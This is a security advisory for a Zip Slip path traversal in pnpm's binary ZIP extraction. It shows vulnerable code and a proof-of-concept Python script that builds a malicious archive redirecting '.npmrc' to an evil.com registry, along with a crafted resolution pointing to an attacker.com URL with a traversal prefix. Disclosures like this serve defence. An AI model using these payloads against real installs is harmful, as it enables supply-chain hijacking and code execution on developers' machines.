CVE-2026-23888
pnpm: Binary ZIP extraction allows arbitrary file write via path traversal (Zip Slip)
Description
### Summary A path traversal vulnerability in pnpm's binary fetcher allows malicious packages to write files outside the intended extraction directory. The vulnerability has two attack vectors: (1) Malicious ZIP entries containing `../` or absolute paths that escape the extraction root via AdmZip's `extractAllTo`, and (2) The `BinaryResolution.prefix` field is concatenated into the extraction path without validation, allowing a crafted prefix like `../../evil` to redirect extracted files outside `targetDir`. ### Details The vulnerability exists in the binary fetching and extraction logic: **1. Unvalidated ZIP Entry Extraction (`fetching/binary-fetcher/src/index.ts`)** AdmZip's `extractAllTo` does not validate entry paths for path traversal: ```typescript const zip = new AdmZip(buffer) const nodeDir = basename === '' ? targetDir : path.dirname(targetDir) const extractedDir = path.join(nodeDir, basename) zip.extractAllTo(nodeDir, true) // Entry paths not validated! await renameOverwrite(extractedDir, targetDir) ``` A ZIP entry with path `../../../.npmrc` will be written outside `nodeDir`. **2. Unvalidated Prefix in BinaryResolution (`resolving/resolver-base/src/index.ts`)** The `basename` variable comes from `BinaryResolution.prefix` and is used directly in path construction: ```typescript const extractedDir = path.join(nodeDir, basename) // If basename is '../../evil', this points outside nodeDir ``` ### PoC **Attack Vector 1: ZIP Entry Path Traversal** ```python import zipfile import io zip_buffer = io.BytesIO() with zipfile.ZipFile(zip_buffer, 'w') as zf: # Normal file zf.writestr('node-v20.0.0-linux-x64/bin/node', b'#!/bin/sh\necho "legit node"') # Malicious path traversal entry zf.writestr('../../../.npmrc', b'registry=https://evil.com/\n') with open('malicious-node.zip', 'wb') as f: f.write(zip_buffer.getvalue()) ``` **Attack Vector 2: Prefix Traversal via malicious resolution:** ```json { "resolution": { "type": "binary", "url": "https://attacker.com/node.zip", "prefix": "../../PWNED" } } ``` ### Impact - All pnpm users who install packages with binary assets - Users who configure custom Node.js binary locations - CI/CD pipelines that auto-install binary dependencies - Can overwrite config files, scripts, or other sensitive files leading to RCE Verified on pnpm main @ commit `5a0ed1d45`.
How to fix CVE-2026-23888
To remediate CVE-2026-23888, upgrade the affected package to a fixed version below.
- —